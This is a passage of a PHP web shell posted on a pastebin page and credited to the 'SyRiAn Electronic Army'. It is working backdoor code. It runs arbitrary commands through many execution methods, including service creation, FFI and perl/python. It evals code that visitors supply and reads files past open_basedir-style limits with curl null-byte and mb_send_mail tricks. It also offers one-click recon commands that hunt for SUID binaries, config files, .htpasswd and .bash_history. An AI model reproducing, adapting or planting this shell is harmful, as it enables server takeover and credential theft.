  660.     $m->query("LOAD DATA LOCAL INFILE '".$path."' INTO TABLE a.a");
  661.     $m->close();
  662. }
  663. function DBConnect($host,$user,$pass,$db) {
  664.     $connect = mysql_pconnect($host,$user,$pass);
  665.     if(!$connect){echo "Can't Connect to [ ".$host." ] [ ".$user." ] [ ".$pass." ]"; return false;  }
  666.     else {
  667.         $tryToSelectDB = mysql_select_db($db,$connect);
  668.         if(!$tryToSelectDB){echo "Can't Enter The Database [ ".$db." ]"; return false;      }
  669.         else{return true; return $connect;}
  670.     }
  671. }
  672. function ReadId($path) {
  673.     for($uid=0;$uid<60000;$uid++) {  
  674.         $ara = posix_getpwuid($uid);
  675.         if (!empty($ara)){while (list ($key, $val) = eah($ara)){$content .= $val;}
  676.         }
  677.     }
  678.     return $content;
  679. }
  680. function ImapF($path) {
  681.     $stream = imap_open($path, "", "");
  682.     $str = imap_body($stream, 1);
  683.     imap_close($stream);
  684.     return $str;
  685. }
  686. function FileF($path) {
  687.     $lines = file($path); foreach($lines as $line){$content .= $line;}
  688.     return $content;
  689. }
  690. function CopyF($path) {
  691.     $tempFile = md5(uniqid()).".bb";
  692.     copy($path,$tempFile);
  693.     $content = file_get_contents($tempFile);
  694.     unlink($tempFile);
  695.     return $content;
  696. }
  697. function fgetssF($path) {
  698.     while(($line = fgetss($path)) != false){$content .= $line;}
  699.     return $content;
  700. }
  701. function highlightFile($path) {
  702.     return highlight_file($path);
  703. }
  704. function mbSendEmail($path) {
  705.     if(function_exists('mb_send_mail')) {
  706.         $tempFile = uniqid();
  707.         $additional_param = "-C ".$path." -X ".getcwd()."/".$tempFile;
  708.         mb_send_mail("email@example.com", NULL, NULL, NULL, $additional_param);
  709.         $content = file_get_contents($tempFile);
  710.         unlink($tempFile);
  711.         return $content;
  712.     }
  713. }
  714. function DeleteFile($fileName) {
  715.     global $os;
  716.     if(function_exists('unlink'))
  717.     {$delete = unlink($fileName);}
  718.     if((!$delete) && ($os == 'Windows'))
  719.     {$delete = Exe("del $fileName"); }
  720.     else if((!$delete) && ($os == 'Linux'))
  721.     {$delete = Exe("rm -f $fileName");}
  722.     if($delete){return true;}else{return false;}
  723. }
  724. function CurlFileRead($path) {
  725.     $ch = curl_init("file://".$path."\x00".__FILE__);
  726.     var_dump(curl_exec($ch));
  727. }
  728. function FReadF($path) {
  729.     $file = fopen($path,'r+'); //Open The File
  730.     if(function_exists('fread')){htmlspecialchars(fread($file,filesize($file)));}
  731.     fclose($file);
  732. }
  733. function TempnameF($path) {
  734.     global $dir;
  735.     $temp = tempnam($dir, "cx");
  736.     if(copy("compress.zlib://".$path, $temp)) {
  737.         $handler = fopen($temp, "r");
  738.         $readFile = fread($handler, @filesize($temp));
  739.         fclose($handler);
  740.         $content .= htmlspecialchars($filename);
  741.         $content .= nl2br(htmlspecialchars($readFile));
  742.         $content .= htmlspecialchars($filename);
  743.         unlink($temp);
  744.         return $content;
  745.     }  
  746. }
  747. function Evaluation($eval) {
  748.     $eval = str_replace(array("<?php","<?","?>"),"",$eval);
  749.     $eval = eval($eval);
  750.     if($eval){return true;}else{return false;}
  751. }
  752. function Oracle() {
  753.     if(function_exists('ocilogon')){$oracle = '<font color="red">ON</font>';}
  754.     else {$oracle = '<font color="green">OFF</font>';}return $oracle;
  755. }
  756. function MsSQL() {
  757.     if(function_exists('mssql_connect')){$msSQL = '<font color="red">ON</font>';}
  758.     else {$msSQL = '<font color="green">OFF</font>';}return $msSQL;
  759. }
  760. function MySQL2() {
  761.     $mysql_try = function_exists('mysql_connect');
  762.     if($mysql_try){$mysql = '<font color="red">ON</font>';}
  763.     else {$mysql = '<font color="green">OFF</font>';}return $mysql;
  764. }
  765. function MSQL() {
  766.     if (function_exists('msql_connect')){$mSql = '<font color="red">ON</font>';}
  767.     else {$mSql = '<font color="green">OFF</font>';}return $mSql;
  768. }
  769. function MysqlI() {
  770.     if (function_exists('mysqli_connect')){$mysqli = '<font color="red">ON</font>';}
  771.     else {$mysqli = '<font color="green">OFF</font>';}return $mysqli;
  772. }
  773. function Gzip() {
  774.     if (function_exists('gzencode')){$gzip = '<font color="red">ON</font>';}
  775.     else {$gzip = '<font color="green">OFF</font>';}return $gzip;
  776. }
  777. function openBaseDir() {
  778.     $openBaseDir = ini_get("open_basedir");
  779.     if (!$openBaseDir){$openBaseDir = '<font color="green">OFF</font>';}
  780.     else {$openBaseDir = '<font color="red">ON</font>';}   
  781.     return $openBaseDir;
  782. }
  783. function Curl() {
  784.     if(extension_loaded('curl')){$curl = '<font color="red">ON</font>';}
  785.     else{$curl = '<font color="green">OFF</font>';}return $curl;
  786. }
  787. function magicQouts() {
  788.     if(function_exists('get_magic_quotes_gpc')){$mag = get_magic_quotes_gpc();}
  789.     if (empty($mag)){$mag = '<font color="green">OFF</font>';}
  790.     else {$mag= '<font color="red">ON</font>';}return $mag;
  791. }
  792. function SafeMode() {
  793.     $safe_mode = ini_get("safe_mode");
  794.     if (!$safe_mode){$safe_mode = '<font color="green">OFF</font>';}
  795.     else {$safe_mode = '<font color="red">ON</font>';}
  796.     return $safe_mode;
  797. }
  798. function DisableFunctions() {
  799.     $disfun = ini_get('disable_functions');
  800.     if (empty($disfun)){$disfun = '<font color="green">NONE</font>';}return $disfun;
  801. }
  802. function RegisterGlobals() {
  803.     if(ini_get('register_globals')){$registerg= '<font color="red">ON</font>';}
  804.     else{$registerg= '<font color="green">OFF</font>';}return $registerg;
  805. }
  806. function GetRealIP() {
  807.     if (getenv(HTTP_X_FORWARDED_FOR)){$ip=getenv(HTTP_X_FORWARDED_FOR);}
  808.     elseif (getenv(HTTP_CLIENT_IP)){$ip=getenv(HTTP_CLIENT_IP);}
  809.     else {$ip=getenv(REMOTE_ADDR);}
  810.     return $ip;
  811. }
  812. function SelectCommand($os) {
  813.     global $os;
  814.     if($os == 'Windows') {
  815.         echo "
  816.         <select name='alias' id='alias' onChange='AddAlias();' >
  817.         <option value=''>NONE</option> 
  818.         <option value='dir' >List Directory</option>
  819.         <option value='dir /s /w /b index.php'>Find index.php in current dir</option>
  820.         <option value='dir /s /w /b *config*.php'>Find *config*.php in current dir &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  &nbsp;  &nbsp;  &nbsp;  &nbsp;  &nbsp;</option>
  821.         <option value='netstat -an'>Show active connections</option>
  822.         <option value='net start'>Show running services</option>
  823.         <option value='tasklist'>Show Pro</option>
  824.         <option value='net user'>User accounts</option>
  825.         <option value='net view'>Show computers</option>
  826.         <option value='arp -a'>ARP Table</option>
  827.         <option value='ipconfig /all'>IP Configuration</option>
  828.         <option value='netstat -an'>netstat -an</option>
  829.         <option value='systeminfo'>System Informations</option>
  830.         <option value='getmac'>Get Mac Address</option>
  831.         </select>
  832.         ";
  833.     }
  834.     else {
  835.         echo "
  836.         <select name='alias' id='alias' onChange='AddAlias();' >
  837.         <option value=''>NONE</option> 
  838.         <option value='ls -la'>List dir</option>
  839.         <option value='cat /etc/hosts'>IP Addresses</option>
  840.         <option value='cat /proc/sys/vm/mmap_min_addr'>Check MMAP</option>
  841.         <option value='lsattr -va'>list file attributes on a Linux second extended file system</option>
  842.         <option value='netstat -an | grep -i listen'>show opened ports</option>
  843.         <option value='find / -type f -perm -04000 -ls'>find all suid files</option>
  844.         <option value='find . -type f -perm -04000 -ls'>find suid files in current dir</option>
  845.         <option value='find / -type f -perm -02000 -ls'>find all sgid files</option>
  846.         <option value='find . -type f -perm -02000 -ls'>find sgid files in current dir</option>
  847.         <option value='find / -type f -name config.inc.php'>find config.inc.php files</option>
  848.         <option value='find / -type f -name \"config*\"'>find config* files</option>
  849.         <option value='find . -type f -name \"config*\"'>find config* files in current dir</option>
  850.         <option value='find / -perm -2 -ls'>find all writable folders and files</option>
  851.         <option value='find . -perm -2 -ls'>find all writable folders and files in current dir</option>
  852.         <option value='find / -type f -name service.pwd'>find all service.pwd files</option>
  853.         <option value='find . -type f -name service.pwd'>find service.pwd files in current dir</option>
  854.         <option value='find / -type f -name .htpasswd'>find all .htpasswd files</option>
  855.         <option value='find . -type f -name .htpasswd'>find .htpasswd files in current dir</option>
  856.         <option value='find / -type f -name .bash_history'>find all .bash_history files</option>
  857.         <option value='find . -type f -name .bash_history'>find .bash_history files in current dir</option>
  858.         <option value='find / -type f -name .fetchmailrc'>find all .fetchmailrc files</option>
  859.         <option value='find . -type f -name .fetchmailrc'>find .fetchmailrc files in current dir</option>
  860.         <option value='locate httpd.conf'>locate httpd.conf files</option>
  861.         <option value='locate vhosts.conf'>locate vhosts.conf files</option>
  862.         <option value='locate proftpd.conf'>locate proftpd.conf files</option>
  863.         <option value='locate psybnc.conf'>locate psybnc.conf files</option>
  864.         <option value='locate my.conf'>locate my.conf files</option>
  865.         <option value='locate admin.php'>locate admin.php files</option>
  866.         <option value='locate cfg.php'>locate cfg.php files</option>
  867.         <option value='locate conf.php'>locate conf.php files</option>
  868.         <option value='locate config.dat'>locate config.dat files</option>
  869.         <option value='locate config.php'>locate config.php files</option>
  870.         <option value='locate config.inc'>locate config.inc files</option>
  871.         <option value='locate config.inc.php'>locate config.inc.php</option>
  872.         <option value='locate config.default.php'>locate config.default.php files</option>
  873.         <option value='locate config'>locate config* files </option>
  874.         <option value='locate \".conf\"'>locate .conf files</option>
  875.         <option value='locate \".pwd\"'>locate .pwd files</option>
  876.         <option value='locate \".sql\"'>locate .sql files</option>
  877.         <option value='locate \".htpasswd\"'>locate .htpasswd files</option>
  878.         <option value='locate \".bash_history\"'>locate .bash_history files</option>
  879.         <option value='locate \".mysql_history\"'>locate .mysql_history files</option>
  880.         <option value='locate \".fetchmailrc\"'>locate .fetchmailrc files</option>
  881.         <option value='locate backup'>locate backup files</option>
  882.         <option value='locate dump'>locate dump files</option>
  883.         <option value='locate priv'>locate priv files</option>
  884.         </select>
  885.         ";
  886.     }
  887. }
  888. function CSS($sh3llColor) {
  889.     $css =  "
  890.     <style>
  891.     BODY
  892.     {
  893.         FONT-FAMILY: Verdana;
  894.         margin: 2;
  895.         background-color: #000000;
  896.         color:white;
  897.         font-size:10pt;
  898.     }
  899.     sy  
  900.     {
  901.         color:".$sh3llColor.";
  902.         font-size:7pt;
  903.     }
  904.     #Box
  905.     {
  906.         color:".$sh3llColor.";
  907.         background-color:#000;
  908.         font-size:14px;
  909.         font-weight:bold;
  910.  
  911.         border:none;
  912.     }
  913.     table
  914.     {
  915.         border:none;
  916.         BORDER:  #eeeeee  outset;
  917.         BACKGROUND-COLOR: #000000;
  918.         color: #cccccc;
  919.         font-size:10px;
  920.     }
  921.     tr
  922.     {
  923.         BORDER-RIGHT:  #cccccc 1px solid;
  924.         BORDER-TOP:    #cccccc 1px solid;
  925.         BORDER-LEFT:   #cccccc 1px solid;
  926.         BORDER-BOTTOM: #cccccc 1px solid;
  927.         color: #ffffff;
  928.     }
  929.     td
  930.     {
  931.         BORDER-RIGHT:  #cccccc 1px solid;
  932.         BORDER-TOP:    #cccccc 1px solid;
  933.         BORDER-LEFT:   #cccccc 1px solid;
  934.         BORDER-BOTTOM: #cccccc 1px solid;
  935.         color: #cccccc;
  936.     }
  937.  
  938.     input
  939.     {
  940.         BORDER-RIGHT:  ".$sh3llColor." 1px solid;
  941.         BORDER-TOP:    ".$sh3llColor." 1px solid;
  942.         BORDER-LEFT:   ".$sh3llColor." 1px solid;
  943.         BORDER-BOTTOM: ".$sh3llColor." 1px solid;
  944.         BACKGROUND-COLOR: #333333;
  945.         font: 9pt tahoma;
  946.         color: #ffffff;
  947.     }
  948.     select
  949.     {
  950.         BORDER-RIGHT:  #ffffff 1px solid;
  951.         BORDER-TOP:    #999999 1px solid;
  952.         BORDER-LEFT:   #999999 1px solid;
  953.         BORDER-BOTTOM: #ffffff 1px solid;
  954.         BACKGROUND-COLOR: #000000;
  955.         font: 9pt tahoma;
  956.         color: #CCCCCC;;
  957.     }
  958.     submit
  959.     {
  960.         BORDER:  1px outset buttonhighlight;
  961.         BACKGROUND-COLOR: #272727;
  962.         width: 40%;
  963.         color: #cccccc;
  964.     }
  965.     textarea
  966.     {
  967.         BORDER-RIGHT:  #ffffff 1px solid;
  968.         BORDER-TOP:    #999999 1px solid;
  969.         BORDER-LEFT:   #999999 1px solid;
  970.         BORDER-BOTTOM: #ffffff 1px solid;
  971.         BACKGROUND-COLOR: #333333;
  972.         color: #ffffff;
  973.     }
  974.     .Save{
  975.         width:500px;   
  976.         border-color:red;
  977.     }
  978.     A:link {COLOR:".$sh3llColor."; TEXT-DECORATION: none;}
  979.     A:visited { COLOR:".$sh3llColor."; TEXT-DECORATION: none;}
  980.     A:active {COLOR:".$sh3llColor."; TEXT-DECORATION: none;}
  981.     A:hover {color:blue;TEXT-DECORATION: none;}
  982.     </style>
  983.     <script>
  984.     function openPHPInfo(){my_window= window.open (\"?info=getPhpInfo\",\"PHP Info\",\"width=800,height=600,scrollbars=1\");    }
  985.     function AddAlias(){document.getElementById('CMD_Line').value = document.getElementById('alias').value; }
  986.     function addUploadInput(){document.getElementById('uploadInput').innerHTML += '<input type=\'file\' name=\'uploadfile[]\'>';    }
  987.     function change_dir_mode() {
  988.         var dir_mode = document.getElementById('dir_mode').value;
  989.         document.location = '?dir_mode='+dir_mode;
  990.     }
  991.     </script>
  992.     ";
  993.     return $css;
  994. }
  995. function filter($string) {
  996.     if(get_magic_quotes_gpc() != 0){return stripslashes($string);   }
  997.     else{return $string;    }
  998. }
  999. function footer() {
  1000.     echo '
  1001.     <table width="100%">
  1002.     <tr>
  1003.     <td width="100%"><center>
  1004.     <sy>  ~~<< </sy>SyRiAn Electronic Army<sy> >>~~</sy></b><br/>
  1005.     <sy>  ~~<< </sy><a href="http://www.syrian-es.com" target="_blank">www.syrian-es.com</a><sy> >>~~</sy></b><br />
  1006.     <sy>  ~~<< </sy>sea.coders@hotmail.com<sy> >>~~</sy></b>
  1007.     </center></td>
  1008.     </tr>
  1009.     </table>
  1010.     </body></html>
  1011.     ';
  1012. }
  1013. function print_exe_method() {
  1014.     global $os; global $exec_method;
  1015.     if($os == "Linux") {
  1016.         ?>
  1017.         <select name="exe_method" >
  1018.             <option value="exec" <?php if($exec_method == "exec") {echo "selected";} ?>>exec()</option>
  1019.             <option value="system" <?php if($exec_method == "system") {echo "selected";} ?>>system</option>
  1020.             <option value="shell_exec" <?php if($exec_method == "shell_exec") {echo "selected";} ?>>shell_exec</option>
  1021.             <option value="passthru" <?php if($exec_method == "passthru") {echo "selected";} ?>>passthru()</option>
  1022.             <option value="proc_open" <?php if($exec_method == "proc_open") {echo "selected";} ?>>proc_open()</option>
  1023.             <option value="popen" <?php if($exec_method == "popen") {echo "selected";} ?>>popen()</option>
  1024.             <option value="perl" <?php if($exec_method == "perl") {echo "selected";} ?>>perl</option>
  1025.             <option value="python" <?php if($exec_method == "python") {echo "selected";} ?>>python</option>
  1026.         </select>
  1027.         <?php
  1028.     } else {
  1029.         ?>
  1030.         <select name="exe_method" >
  1031.             <option value="exec" <?php if($exec_method == "exec") {echo "selected";} ?>>exec()</option>
  1032.             <option value="system" <?php if($exec_method == "system") {echo "selected";} ?>>system()</option>
  1033.             <option value="shell_exec" <?php if($exec_method == "shell_exec") {echo "selected";} ?>>shell_exec()</option>
  1034.             <option value="passthru" <?php if($exec_method == "passthru") {echo "selected";} ?>>passthru()</option>
  1035.             <option value="proc_open" <?php if($exec_method == "proc_open") {echo "selected";} ?>>proc_open()</option>
  1036.             <option value="popen" <?php if($exec_method == "popen") {echo "selected";} ?>>popen()</option>
  1037.             <option value="win_shell_execute" <?php if($exec_method == "win_shell_execute") {echo "selected";} ?>>win_shell_execute()</option>
  1038.             <option value="win32_create_service" <?php if($exec_method == "win32_create_service") {echo "selected";} ?>>win32_create_service()</option>
  1039.             <option value="ffi" <?php if($exec_method == "ffi") {echo "selected";} ?>>ffi</option>
  1040.             <option value="perl" <?php if($exec_method == "perl") {echo "selected";} ?>>perl</option>
  1041.             <option value="python" <?php if($exec_method == "python") {echo "selected";} ?>>python</option>
  1042.             <option value="slash_bypass <?php if($exec_method == "slash_bypass") {echo "selected";} ?>">slash bypass</option>
  1043.         </select>
  1044.         <?php
  1045.     }
  1046. }
  1047. function Exe($command) {
  1048.     global $dir;global $os;global $exec_method;
  1049.     $command = filter($command);
  1050.    
  1051.     if($exec_method == "exec") {
  1052.         exec($command,$output);echo join("\n",$output);
  1053.     } else if($exec_method == "system") {
  1054.         system($command);
  1055.     } else if($exec_method == "shell_exec") {
  1056.         echo shell_exec($command);
  1057.     } else if($exec_method == "passthru") {
  1058.         passthru($command);
  1059.     } else if($exec_method == "proc_open") {
  1060.         echo proc_exec($command,$dir);
  1061.     } else if($exec_method == "popen") {
  1062.         $fp = popen($command,"r");{while(!feof($fp)){$result.=fread($fp,1024);}pclose($fp);}echo convert_cyr_string($result,"d","w");
  1063.     } else if($exec_method == "win_shell_execute") {
  1064.         echo winshell($command);
  1065.     } else if($exec_method == "win32_create_service") {
  1066.         echo srvshell($command);
  1067.     } else if($exec_method == "ffi") {
  1068.         echo ffishell($command);
  1069.     } else if($exec_method == "perl") {
  1070.         echo perlshell($command);
  1071.     } else if($exec_method == "python") {
  1072.         echo python_eval("import os\nos.system('".$command."')");
  1073.     } else if($exec_method == "slash_bypass") {
  1074.         echo slashBypass($command);
  1075.     }
  1076. }
  1077. function proc_exec($com , $dir) {
  1078.     $start_pipe=array(0=>array("pipe","w"),1=>array("pipe","w"));
  1079.     $process=proc_open($com,$start_pipe,$pipes,$dir,NULL);
  1080.     return stream_get_contents($pipes[1]);
  1081. }
  1082. function winshell($command) {
  1083.     $name=whereistmP()."\\".uniqid('NJ');
  1084.     win_shell_execute('cmd.exe','',"/C $command >\"$name\"");
  1085.     sleep(1);
  1086.     $exec=file_get_contents($name);
  1087.     DeleteFile($name);
  1088.     return $exec;
  1089. }
  1090. function srvshell($command) {
  1091.     $name=whereistmP()."\\".uniqid('NJ');
  1092.     $n=uniqid('NJ');
  1093.     $cmd=(empty($_SERVER['ComSpec']))?'d:\\windows\\system32\\cmd.exe':$_SERVER['ComSpec'];
  1094.     win32_create_service(array('service'=>$n,'display'=>$n,'path'=>$cmd,'params'=>"/c $command >\"$name\""));
  1095.     win32_start_service($n);
  1096.     win32_stop_service($n);
  1097.     win32_delete_service($n);
  1098.     while(!file_exists($name))sleep(1);
  1099.     $exec=file_get_contents($name);
  1100.     DeleteFile($name);
  1101.     return $exec;
  1102. }
  1103. function ffishell($command) {
  1104.     $name=whereistmP()."\\".uniqid('NJ');
  1105.     $api=new ffi("[lib='kernel32.dll'] int WinExec(char *APP,int SW);");
  1106.     $res=$api->WinExec("cmd.exe /c $command >\"$name\"",0);
  1107.     while(!file_exists($name))sleep(1);
  1108.     $exec=file_get_contents($name);
  1109.     DeleteFile($name);
  1110.     return $exec;
  1111. }
  1112. function perlshell($command) {
  1113.     $perl=new perl();
  1114.     ob_start();
  1115.     $perl->eval("system('".$command."')");
  1116.     $exec=ob_get_contents();
  1117.     ob_end_clean();
  1118.     return $exec;
  1119. }
  1120. function slashBypass($cmd) {
  1121.     GenerateFile("cmd.bat","$cmd>sy3.txt"."\r\n exit");
  1122.     exec("\start cmd.bat");
  1123.     $content = file_get_contents('sy3.txt');
  1124.     unlink('sy3.txt');
  1125.     return $content;
  1126. }
  1127. function GenerateFile($name,$content) {
  1128.     if(function_exists('fopen') && function_exists('fclose')) {
  1129.         $file = fopen($name,"w+");
  1130.         if($file) {
  1131.             if(function_exists('fwrite')){$writeFile = fwrite($file,$content); }   
  1132.             else if (function_exists('fputs')){$writeFile = fputs($file,$content); }
  1133.             else if (function_exists('file_put_contents')){$writeFile = file_put_contents($file,$content);}
  1134.             if(!$writeFile){return false;}
  1135.         }
  1136.         else{return false;}fclose($file);return true;
  1137.     }
  1138. }
  1139. function ScanDirs() {
  1140.     global $os; global $dir;global $safeMode;global $dir_mode;
  1141.     if($dir_mode == "cmd"){if($os == "Windows"){Exe('dir');}else{ Exe('ls -lia');}}
  1142.     else {
  1143.         $result .= "Perms   Size    Time        Owner/Group R/W Type    File
  1144. -----------------------------------------------------------------------------
  1145. ";
  1146.         $handel = opendir($dir);
  1147.         while(($file = readdir($handel))!= false)
  1148.         {
  1149.             $size = filesize($file);
  1150.             if(filetype($file) == "dir"){$type = "<DIR>";}else {$type = "<FILE>";}
  1151.             if(fileowner($file)){$owner = fileowner($file);}else{$owner = "NONE";}
  1152.             if(filegroup($file)){$group = filegroup($file);}else{$group = "NONE";}
  1153.             $perms = fileperms($file);
  1154.             $time = date("y/m/d", filectime($file));
  1155.             if(is_writable($file)){$isWritable = "Y";}else{$isWritable = "N";}
  1156.             if(is_readable($file)){$isReadable = "Y";}else{$isReadable = "N";}
  1157.             $result .= $perms." ".$size."   ".$time."   ".$owner."/".$group."   ".$isReadable."/".$isWritable." ".$type."   ".$file."
  1158. ";
  1159.         }
  1160.     }
  1161.     return $result;
  1162. }
  1163. echo footer();
  1164. ?>
  1165.  
  1166. ########################################################################################################################
  1167.  
  1168.         https://www.facebook.com/Dr.FarFar
  1169.         http://Dr-FarFar.BlogSpot.com/
  1170.  
  1171.         ________         __________                __________                
  1172.         ___  __ \___________  ____/______ ____________  ____/______ _________
  1173.         __  / / /__  ___/__  /_    _  __ `/__  ___/__  /_    _  __ `/__  ___/
  1174.         _  /_/ / _  /___ _  __/    / /_/ / _  /    _  __/    / /_/ / _  /    
  1175.         /_____/  /_/ _(_)/_/       \__,_/  /_/     /_/       \__,_/  /_/    
  1176.                                                                              
  1177.                              ~\ Dr.FarFar /~
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!